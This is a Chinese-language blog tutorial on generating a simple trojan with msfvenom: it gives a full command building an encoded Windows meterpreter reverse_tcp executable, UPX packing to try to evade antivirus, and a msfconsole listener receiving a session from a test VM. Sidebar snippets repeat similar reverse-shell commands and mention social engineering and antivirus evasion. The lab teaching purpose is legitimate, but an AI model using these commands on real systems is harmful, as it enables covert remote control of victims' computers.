简单木马生成

最新推荐文章于 2024-07-28 22:23:00 发布
最新推荐文章于 2024-07-28 22:23:00 发布
阅读量6.2k 收藏 16
点赞数 3
分类专栏: web安全 文章标签: linux 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34444097/article/details/79600503
版权
  1. 工具:msfvenom
    1.1 msfvenom的简介
    msfvenom是kali linux下一个可以产生自定义payload的程序,是净荷生成和编码的组合。msfvenom主要使用msf作为框架,可以多平台互通,并为我们使用和练习提供了非常的帮助。有关msfvenom的参数,在这里我只说几个比较常用的参数,其他的请百度。
    1.2msfvenom的常用参数:
    -p :< payload >
    指定一个有效的自定义载荷
    -l :< list >
    列出一个模块类型,选项有:有效载荷,编码器,NOP,所有
    -f:< format >
    输出格式
    -a:< arch >
    使用的架构
    -i:< iterations >
    有效载荷的次数
    -e:< encoder >
    所使用的编码方式
    2.实例
    在终端输入以下命令
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b "\x00" lhost=10.5.69.128 lport=4444 -f exe > test.exe

这里写图片描述
可以看到,在主文件下已经生成了test.exe文件
这里写图片描述
将该文件拖拽到测试机中使用杀毒软件扫描
这里写图片描述
扫描结果:
这里写图片描述
用upx命令对文件压缩加壳
这里写图片描述
再次用杀毒软件测试是否免杀,没通过,没事我们把该文件复制到虚拟机win7中继续我们的工作(哈哈,这里不是为了打广告,而是这个木马确实很简陋很简陋,再说杀毒软件也不是摆设对不对)
这里写图片描述

复制到虚拟机中的win7之后双击运行,打开linux终端,输入msfconsole,开始监听,

按下图所示输入命令,设置监听选项,
这里写图片描述
依次输入下列命令,回车,已经开始监听
这里写图片描述
然后在测试机双击运行test,可以看到在主机上看到了会话
这里写图片描述

wkend
关注
专栏目录
Metasploit 生成木马
2201_75516783的博客
11-28 794
Ox01 简介 在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马在社会工程学中是我们经常使用的手段,本次实验我们将学习如何通过Metasploit的 msfvenom命令来生成木马。 Ox02 使用msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp Ihost=103.46.128.46 lport=55497 -f exe >/home/anonymous/文件名.e
一个简单木马程序的实现
热门推荐
天绝弑杀
06-09 1万+
一个简单木马的实现,麻雀虽小,五脏俱全,用到了socket和窗口隐藏技术
木马生成技术
zhoubaocun的专栏
04-02 559
作者:open来源:opens Blog经常会看到鸽子或一些木马可以自定义生成一个服务端程序,开始很奇怪,他是怎么做到的!后来去网上搜了下,但是没找到相关文章! 后来碰巧得到了一个QQ病毒的源代码,而这个程序就可以生成一个文件,于是就研究了下代码,但是收获不大,但是很实用,他的大致思路和鸽子是一样的:原理一:在程序的尾部追加数据,然后程序运行时从尾部读取数据,这个方法看似容易,但是实际操作的时候
做一个图片马(图片木马)的四种方法 小白也能看会(详细步骤 ) 需要.htaccess等执行图片内代码
最新发布
qq_48368964的博客
07-28 1468
图片马:就是在图片中隐藏一句话木马。利用.htaccess等。
Metasploit(msf)木马生成
m0_58713554的博客
11-04 324
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击端ip LPORT=1234 -f exe > /root/新建文件的文件名.exe 2 ls 查看是否创建出了该文件 3 然后进入msfconsole进行监听 4 use exploit/multi/handler 进入监听模式 5 set PAYLOAD set LHOST攻击机ip set LPORT 配置参数 6 run 运行 7 把刚...
Metasploit -- 木马生成原理和方法
weixin_41489908的博客
05-07 2245
以前的人,要疯要癫要崩溃,都特别戏剧化,比如披头散发,涕泗横流,瞠目结舌等等。现在的人不会,他就静静地坐在那里,面无表情,不声不响,看着很正常,但禁不起触碰。你上前轻轻碰一下,问一句,他就垮了,就崩溃了。。。 ---- 网易云热评 一、生成方式:利用msf模块中的msfvenom模块 二、原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马...
msfvenom 生成php木马,利用msfvenom生成木马程序
weixin_36051235的博客
03-26 1882
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.二,工具:MSF三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线四,过程:1,查看帮助命令:root#msfvenom-h结果:2,生成meterpreterpayload并利用shikata_g...
网络安全技术新手入门 利用Kali Linux生成简单的远程控制木马_kali生成远程
m0_60226911的博客
04-29 575
输入命令:set payload windows/x64/meterpreter/reverse_tcp。2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?设置攻击机的ip地址,该ip地址为读者所使用的Kali Linux的地址。6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?9、讲述一下Tomcat8005、8009、8080三个端口的含义?7、Tomcat和Resin有什么区别,工作中你怎么选择?设置监听的端口,该端口应该同生成木马时所使用的端口一致。
kali-TheFatRat木马生成工具安装及简单使用
qq_35258210的博客
02-10 1万+
kali终端下载 命令:git clone https://github.com/Screetsec/TheFatRat.git 推荐使用浏览器github上下载,比命令下载要快 浏览器下载:https://github.com/Screetsec/TheFatRat.git 下载完后将压缩包放到kali系统里 使用终端解压文件 命令:unzip 接下来要使用到的是这三个工具,我们想要使用先给它们添加可执行权限 命令:chmod +x setup.sh powerfull.s
Metasploit 实现木马生成、捆绑及免杀
阿里云云栖号
10-08 5291
简介:在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。本次实验我们将学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理。木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。 实验环境: Kali Linux 知识点: msfvenom 如何生.
msfvenom生成木马简单利用
xj28555的博客
08-10 5618
1、简介 本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10。 2、实验环境 1、一台kali虚拟机 ip为192.168.110.140 2、一台win10虚拟机 3、实验步骤 1、首先使用msfvenom生成一个可以被windows执行的exe木马文件。 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.110.140 lpor.
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 913
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
MSF生成木马木马简单使用
爱喝水的仙人树的博客
11-03 9144
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
关于木马生成技术
06-19 583
文:RQC 以前才接触一些别人写的远程控制类软件的时候,总感觉很神奇,尤其是那个可以自定义生成一个带密码的木马,现在知道是怎么搞的了!,比如在C#里   如下:1.先把被控端(木马端)加载到程序资源文件里2.从服务端文件把被控端分离出来下来就是如何取到资源文件了,在C#中提供这样一个类:Resources,需要引入PrjServer.Properties 这个命名空间,我们
网络安全技术新手入门:利用Kali Linux生成简单的远程控制木马
weixin_56154577的博客
01-08 5723
本文对木马生成过程讲的比较详细,适合对网络安全技术感兴趣的小伙伴们,读完本文之后,读者可以对木马的形成、传播、对靶机的控制流程有一个逻辑性的理解
木马生成技术详解
08-08 872
 有些木马在解压缩之后只会有一个客户端程序,用户可以通过在客户端的一些设置工作来自动生成针对性比较强的服务端程序,例如特定的端口、击键木马的邮件地址、密码、SMTP服务器等等。在本文中,我将简要地探讨这一技术的实现。    从“生成”的这个事实来看,我们可以猜想客户端程序可能本身绑有一段自定义的二进制数据,这段二进制数据实质上就是一个服务端的模板。在用户进行了设置工作之后,客户端就会将设置
如何制作一个计算机病毒,怎样制作一个简单的电脑病毒
weixin_42112894的博客
07-15 1万+
如何才能做出一个简单的电脑病毒呢!和朋友们开开小玩笑呢!下面由学习啦小编给你做出详细的制作简单的电脑病毒介绍!希望对你有帮助!制作简单的电脑病毒介绍:这是个简单的后门(cmdshell)#i ncludeint main(int argc,char*argv[]){return 0;}//这个大家都知道了然后添加头文件C m d S h e l l.h跟Socket.h#i nclude//WIN...
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 3572
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
千机:红队免杀木马自动生成器 - 一键打造你的攻防利器
gitblog_00055的博客
05-25 448
千机:红队免杀木马自动生成器 - 一键打造你的攻防利器 项目地址:https://gitcode.com/Pizz33/Qianji 项目简介 在信息安全领域,攻防对抗是一场永不停歇的较量。"千机"是由Hyyrent开发的一款创新性的红队工具,它是一款专为安全研究人员和攻防竞赛参与者设计的免杀木马自动生成器。只需简单的操作,你就能轻松创建难以被杀毒软件察觉的Stageless...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值